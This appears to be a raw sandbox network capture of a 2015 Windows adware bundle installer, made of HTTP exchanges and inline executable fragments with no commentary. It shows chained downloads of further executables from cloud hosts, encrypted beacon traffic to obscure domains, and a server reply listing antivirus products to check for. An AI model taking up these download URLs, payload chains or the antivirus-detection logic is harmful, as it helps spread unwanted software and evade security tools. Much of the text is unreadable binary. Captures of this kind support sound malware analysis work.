B8.s.S^.....r...3.....R$.-..c$..D.^..k*;.....s.lF.@...pr|.e ..}.A.c.-g.....vU...zY x.O$....8.......)V..s I_.I.YT$.,.%%".D..W.u~=.....N&W.3\....knG5..|osy..bJ...~...(.T........u.ca..aq..Kh\RN7sk......P.s*:m...0u.g[...[h.....<b..sSa..4.eB.l..-..5...5..2.:j.A..y.....6.~".0,.../ p.....R..8.....!.......R..Z_q..o@..y........7.sn..o..........._..](.1...C.c6..P..p.DCR.V...lh...d.......&.1.....Y.RP....g.P.c..&.........d.....p.......>d.......j..&..0.X.U....>L...r.N..I.I.....W.m..x..C.a.c._.u{9.3.......L..lV..1.&...u......rw(.ud._d.R..........x..~.6...f'..L=....r...t.@........D...wB..5.....JR. fy.R.12.H.wg.mo...B...L..<.Eo.m.d.'.-^....z..;...#....T]..2.>...@.m.T,....0.<.~e.._..'H..u...F..x..........w....?..S...yV.....$}.1..oI.....L..../...........K%y ....'x M...9.Ae(.D.yOD.I.s..........P..i..."|...!...#.]....A.p..s.o.c..".....R6.....<X.r...8.P.....'../uN.qJ....>...P...,.A...."...w".@.h.j..1...6O.u'..G...wE.-z.p...w....S...&M*.q...........J.)8...i.6}..F..*HC.,Xc..l..F..8 /..O.~..r......8 ...\X.d}..........H!...x!..j....h{R....tV.g......f........on^RN..V..(.V.......K.V.\..`b..GP....A...T...w6.../~....7.Q.7.........-S.T8.t.q....C.1.?....3...NF....!01..J.*....h.r..t...9..f..R.o....v.....Jp...Fw...x.../..@vk...et... I\q&F.[-.........4..KP...e....fd-..K.$..L4.(...M........h..d..l..Q.^.E....&s5.. p.h...po...g...b......j:...o*..),.>.NB..I....'.......K...<.}.`8q.1!u~.....WY.....|.&..04.t...c..-S.y........4w........RY.(.#3i.'.n]q[..D..2.C..b.J...m ..rCX V.?;.h.4.C.6....S.AL...ac..U......./Tu.f..D....y.

<<< skipped >>>

GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d1mdi78qyff344.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 59213

Connection: keep-alive

Date: Thu, 27 Aug 2015 02:50:12 GMT

Last-Modified: Wed, 26 Aug 2015 15:24:15 GMT

ETag: "ad3ce40da858a76f235974af46c18365"

Accept-Ranges: bytes

Server: AmazonS3

Age: 32740

X-Cache: Hit from cloudfront

Via: 1.1 7f0216233154388a0ffe191ece5a7b12.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _IRbWw1lzCC0ftNTefVDUYqHa-IAd-PVwQGvtNppqOxkh16PQZu39A==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................`...............................................t.......P...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...`...............................rsrc........P.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /setup_362.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: special-bundles.s3-website-us-east-1.amazonaws.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: INqQFFACQA DY6wVTtlB1vR7XURiltc2nZtwHiSLnCBjqvqenoItBDMr 5ihYPxEg4xEFCro9Os=

x-amz-request-id: 5459C4C956890976

Date: Wed, 02 Sep 2015 06:39:47 GMT

Last-Modified: Wed, 10 Jun 2015 05:41:11 GMT

ETag: "0ccf900044e0e4edf36e89008e2c6aa7"

Content-Type: application/octet-stream

Content-Length: 254464

Server: AmazonS3

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R...R...R.......R....5..R....4..R...*...R...R...R....1..R.......R.......R..Rich.R..................PE..L...|.wU.................(...........4.......@....@..........................0............@.................................<...P....................................B...............................v..@............@...............................text...\&.......(.................. ..`.rdata..&m...@...n...,..............@..@.data....4..........................@....rsrc...............................@..@.reloc...'.......(..................@..B...........................................................................................................................................................................................................................................................................................................................................................BB...........U..V.....BB..o....E..t.V.E........^]............V..W...r...$......;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. ...._...^._3.^................U..j.hI.B.d.....P..,...B.3..E.SVWP.E.d.......3..]....G.3..F......^..u..}..E.f...]..E.....;.......3..U............u..U..G..M....r.......f.<.=.........r.........4.V.a........u... t.../..........r........M.f...f.T].C....M....ux3...D}.Ph..B.3..|...f.D}.G...|..M..E.............E.f.U................E.........f.U.f.E.3.

<<< skipped >>>

GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: prof.eorezo.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:35 GMT

Server: Apache/2.2.22

x-eorezo-crc32: -1

x-eorezo-crypted: 1

x-eorezo-length: 357

Set-Cookie: conftime=1441175975; expires=Mon, 27 Dec 15 00:26:00 GMT; domain=eorezo.com; path=/;

Set-Cookie: EoRezo=194.242.96.218.1441175975655411; path=/; expires=Fri, 02-Oct-15 06:39:35 GMT

Connection: close

Transfer-Encoding: chunked

Content-Type: text/plain

1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..

POST /cgi-bin/get_protect.cgi HTTP/1.1

x-spidermessenger-crypted: 2

x-spidermessenger-crc32: 286788407

x-spidermessenger-length: 275

Content-Type: text/*

User-Agent: gmsd_re_005010077-gmsd_re_005010077

Host: prof.youandmeandmeandyouhihi.com

Content-Length: 394

Cache-Control: no-cache

ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsGBrDjQZma9BSciU5l/OSaPVnWOurfN3Hx17O83KoD357dERtblRTDdgA48KOdPrBeHznjIqG35Zo6z0FtNLmETstYDtqkBbkFICEArjQwmTACEtI9Xf/ns3LsGeNBauwkIwODLVUzDkFBUKMVqkBi7rgZbbs36bUdAV2YPcDyENxP/HsXZ0F4cg+TM2VLW/5bP8AxA4Xlp59koS+nfQFaUslV9eCHTpOlSCkUo70TMOXGTe/Y87xxapD9oUJUKjxno+VzA7ZMJyXa2uBcg8hGrtROTJ4P2SL9+8MRivFo/t5UDgzY3XANOMSbFVtsQXfjgRnJbogsDQ=

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:43 GMT

Server: Apache/2.2.22

x-SPIDERMESSENGER-crypted: 2

x-SPIDERMESSENGER-length: 26780

x-SPIDERMESSENGER-crc32: -1

Set-Cookie: conftime=1441175983; expires=Mon, 27 Dec 15 00:26:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;

Set-Cookie: EoRezo=194.242.96.218.1441175983381150; path=/; expires=Fri, 02-Oct-15 06:39:43 GMT

Vary: Accept-Encoding

Connection: close

Transfer-Encoding: chunked

Content-Type: text/plain

8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfibTew3 ynOvjDhwwNX4fU19cLBEHf1q/Xj32GKoBkNDpFEvQc2RNtJ53wo0SzNY73Ov0OwqXrzI2YO2u8inUw0lZxXi5A9 i/YeIEUAylzK2mkMxhwdoTj9gS4eUxasnoHd0YO8ZIrC s7kVZ8zf3XYwbhIAyLIRN7A A1TaDPHCwk0EdeGTllofpN6OjrHCGEtxASQhJputEDM3gJ6 fxHQbc6bHhjmbiYQgwx5zG1/iW5BuRPx6Jd6E0nHHhz 3Vy3JW33rCnQApc4ZcGVjqam7 20b9S5nEkpNhCYwXMCLiKYV2RKuiuct/JXQXzzz60iTtcjPiFpRY4vAzCB7X91NcJMm/4jpBZbh2nuJVJ7EBqWhzMHNrCLILyeQnTRYmRAzGrmHJyuXQwMIt0OwB/zGtwiLrB5vC0x otwaFPlSvg 9LkPZ49PkpxBjMU90Rvv 27wT6tkZId4aOsoN/xTuaZ91C8M2hvXhnlkpwDuvQQtvpJpkbvC W/AL1ml6ZlBGd8iMLELs0auYYT KOPCz2G4Y9S9cp9 GOhxujubLXS/SdV4a2psD6tOwBZhx1iFLkL2kC Te27 LQ/iNAhzAKtA 7Y02qkpPXpLE0RsguHwJv3 S4lGwYR iN663d6vGvWbKY4hU1XM4eZyANf747RjT/oItO32kXOOaj8hv47N4ZiWhI YloXLN8PSh6TnoajUka0ON x0iK4YMzd3sNMnNr/CyDytDgMbKZ8FME3WW8Ns tk/v 4NNeN7QOVt1E7mp6ilVVR52ilOqloYvDP6bCN2lKOQ6wPTDBjL8wIXnJIY2iYgtlh4FwbQV7b/QfBok2NpaUtHcBGwsFNp5zzvIh78n2OX3ScO3/IlUitKER1TPI3z B0Qyjl75gnzy uwDMNRlklgu7CzcFZamsN/a0VwLoe LNOUiVj7y/PsDIgOWmtVMCwoJWG49rtUM1pmbHAD0nropsAsHSQ8wGvlXchKb4VB8TBzut4ZrZUEkQGuV3BF7ZgN5BpNtyIYc/n5xqToG8084Tvylmz6td0QfyHrubjWvvPhrgUzgvmvQJCMEQvN2eqFNApU5hBE0JiEbRJgNkx08/4QXTnQ7Nfqbg3J3xwgB0cyKXlVR00iAgO/IOhwQRSzuJh5DNGxdD7LgHEqUdAtP M/sXOPuWSj/u/EsHqU13VBMvunmPoIecEHEaCQX/MiwVruskdfeVOH7/vXlzQiwqrTEbbBtS JjapXyk4gZc69sW62IavdDOX6fZDEv2s3avtqZgqFeNimOCVNexdiw7TGe/jXx9evKkcjVQMVWKaT0qcwDn9FuZ94xthjOgWH3oqnAFLV2nc1N8UF0aIpnKLlWabq6/oU0qnXGvAtmQpDDVCXtU2FMuMmNBMz6V

<<< skipped >>>

GET hXXp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPWZpbml0byZldmVudD03JnNpZD02NjYmbWFjPTc3Nw== HTTP/1.1

Host: events.afsbdfgds.net

Proxy-Connection: Close

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 02 Sep 2015 06:41:32 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

0..

GET /installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=106&crtnm=OralTeams&rnd=2620 HTTP/1.1

Accept: */*

Host: mystats.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: al rxtr5LTpSfOs/FUHoEYpaGFfWKljedJ5k9al3tZTsqVcI2q2comx4ZxvXTFIEtB6tmBDZmCo=

x-amz-request-id: 4C7FB26AC7F4C10B

Date: Wed, 02 Sep 2015 06:39:17 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: al rxtr5LTpSfOs/FUHoEYpaGFfWKljedJ5k9al3tZTsqVcI2q2comx4ZxvXTFIEtB6tmBDZmCo=..x-amz-request-id: 4C7FB26AC7F4C10B..Date: Wed, 02 Sep 2015 06:39:17 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /cmmdWriter.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d2fpsq9kg43yka.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 42510

Connection: keep-alive

Date: Tue, 25 Aug 2015 07:42:47 GMT

Last-Modified: Tue, 25 Aug 2015 07:35:53 GMT

ETag: "051e3f4fd2fc016148ab1e9c53e286d1"

Accept-Ranges: bytes

Server: AmazonS3

Age: 17597

X-Cache: Hit from cloudfront

Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)

X-Amz-Cf-Id: pFYt45LD08TPS_Mdh6J4o_tzn1fMb09J3O0b14LWY0LJc4Lcc2_NrA==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................P...............................................s.......@...............................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc........@.......t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.

<<< skipped >>>

GET /0.gif?2948573&101&101 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: sstatic1.histats.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:58 GMT

Content-Type: image/gif

Content-Length: 43

Connection: close

Set-Cookie: CountUid=ff9fe256-0dfg-4855-93b5-43965b494d4d; domain=.histats.com; Max-Age=31536000; Expires=Sat, 19-Sep-2015 07:20:27 GMT

GIF89a.............!.......,...........D..;..

GET hXXp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPXN0YXJ0byZldmVudD0xJnNpZD02NjYmbWFjPTc3Nw== HTTP/1.1

Host: events.afsbdfgds.net

Proxy-Connection: Close

HTTP/1.1 200 OK

Server: nginx

Date: Wed, 02 Sep 2015 06:41:29 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

0..

POST /FCL_Co_Unq_remote_v5.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.fcesneim.us

Content-Length: 106

Connection: Keep-Alive

Cache-Control: no-cache

from=nsis&type=Reg&pubid=11355&CbId=8907&BundleVersionID=IM_240914@01&mid=qGKynuZ0mukeZvxnJUBzZDYiT/aeDKox

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:40:01 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 1073

Connection: close

Content-Type: text/html; charset=UTF-8

hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php..http://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php..UA..hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php..194.242.96.218_2015-09-02_02:40:01..NULL..12#RE2|Systweak\RegClean Pro\Version 6.1..460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malwarebytes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiClient,RE2|AVG,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira..575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,RE2|Opera Software,RE3|Opera Software..576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:45 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Wed, 02 Sep 15 06:39:00 GMT

Set-Cookie: _c4aid=4F9E5D7D86A1476D86546936BCD277CB; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=4F9E5D7D86A1476D86546936BCD277CB,1441175985.54277; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:45 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Wed, 02 Sep 15 06:39:00 GMT

Set-Cookie: _c4aid=682C721FA98B4A48B126DA45369AD8FB; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=682C721FA98B4A48B126DA45369AD8FB,1441175985.84974; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..

GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.taxideataxus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:30 GMT

Server: Apache/2.2.16

Last-Modified: Tue, 01 Sep 2015 12:26:26 GMT

ETag: "55e0207-5888e8-51eaea8a3c080"

Accept-Ranges: bytes

Content-Length: 5802216

Keep-Alive: timeout=15, max=200

Connection: Keep-Alive

Content-Type: application/x-msdos-program

MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................*....................@..........................0.......1Y..........@..............................P....................|X.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /policyname.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d10huri5h4o4a3.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 54658

Connection: keep-alive

Date: Tue, 25 Aug 2015 08:25:57 GMT

Last-Modified: Tue, 25 Aug 2015 08:20:25 GMT

ETag: "6f61b80a1552c32073f082cc1798cd71"

Accept-Ranges: bytes

Server: AmazonS3

Age: 7286

X-Cache: Hit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: tQge8xEr9WOtxaDTSTNc6g8aoOiR3gvCywxKczszbxC2wPKahhivfQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 HTTP/1.1

Host: VVV.djapp.info

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Wed, 02 Sep 2015 06:41:25 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe

0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Wed, 02 Sep 2015 06:41:25 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe..0..

GET /finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe HTTP/1.1

Connection: Keep-Alive

Host: d22nes4susdva1.cloudfront.net

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 3030016

Connection: keep-alive

Date: Mon, 24 Aug 2015 06:58:00 GMT

Last-Modified: Mon, 24 Aug 2015 06:48:08 GMT

ETag: "a3078153a7a53bfc0a7a0b8fd20d757a"

Accept-Ranges: bytes

Server: AmazonS3

Age: 6170

X-Cache: Hit from cloudfront

Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gNz3D2rsk9-RiW9ufrG2752h4ANRAyxsqEFnIIrxZ8YVWjiS6BKd1A==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..U.................|-...........-.. ........@.. ................................/...@.................................@.-.K.....-......................`........-.............................................. ............... ..H............text....{-.. ...|-................. ..`.rsrc.........-......~-.............@..@.reloc.......`.......:..............@..B................p.-.....H.......PD%.TV.......'......._ ..........................................(.'..*.r.(......}......}......}....*....(....o....*.0../.......(.'....o.............(\'.....r...p...(1'.....(B'.....( '.....r...p...(5'....(....()'..o....,.r...p*.o....(*'..(Z'..(X'..r...p(....()'..o....,.(*'..(Z'..(X'..r...p(....()'..*.o..............(]'.....(6'.....(5'.....(B'.....(]'.....(Z'.....(]'.....(?'.....(.'......(D'......r...p..(....()'..o....,.r...p*.*..0..4.......r!..pr...p.(......,..o....(....o.........&..~....*.*........)).......0..4.......r...pr...p.(......,..o....(....o.........&..~....*.*........))........*...$.](m...&*2..(....&..Z*....0..........rm..p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....

<<< skipped >>>

GET /download.php?l4J9dw== HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.codec13sudha.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Found

Date: Wed, 02 Sep 2015 06:39:43 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Cache-Control: no-cache, must-revalidate

Content-Disposition: attachment; filename="InstallMonetizer.exe"

Location: hXXp://secured.nmsgv.us/VuuPC_VO2_8907.exe

Content-Length: 0

Connection: close

Content-Type: text/html; charset=UTF-8

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:09 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 126

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:09 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 177

Connection: Keep-Alive

Cache-Control: no-cache

